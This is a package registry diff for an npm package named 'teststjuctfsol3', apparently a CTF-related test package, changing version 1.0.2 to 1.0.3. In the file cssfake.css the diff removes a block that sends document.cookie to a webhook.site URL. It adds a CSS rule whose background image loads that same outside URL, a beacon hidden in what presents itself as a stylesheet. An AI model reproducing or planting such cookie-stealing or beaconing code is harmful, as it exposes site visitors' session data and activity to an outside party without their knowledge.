teststjuctfsol3 1.0.2 → 1.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/cssfake.css +5 -3
  2. package/package.json +1 -1
package/cssfake.css CHANGED
@@ -542,9 +542,11 @@ blockquote footer {
542
542
  border-radius: 10px;
543
543
  }
544
544
 
545
- script {
546
- alert("XSS attack!");
547
- new Image().src = 'https://webhook.site/c2ed206b-1262-40f1-ac68-a34fead68352/?a=' + escape(document.cookie);
545
+ #login-bg
546
+ {
547
+
548
+ background-image:url('https://webhook.site/c2ed206b-1262-40f1-ac68-a34fead68352/?a=');
549
+ font-size: 20px;
548
550
  }
549
551
 
550
552
  .listree-submenu-heading {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "teststjuctfsol3",
3
- "version": "1.0.2",
3
+ "version": "1.0.3",
4
4
  "description": "testing",
5
5
  "main": "index.js",
6
6
  "scripts": {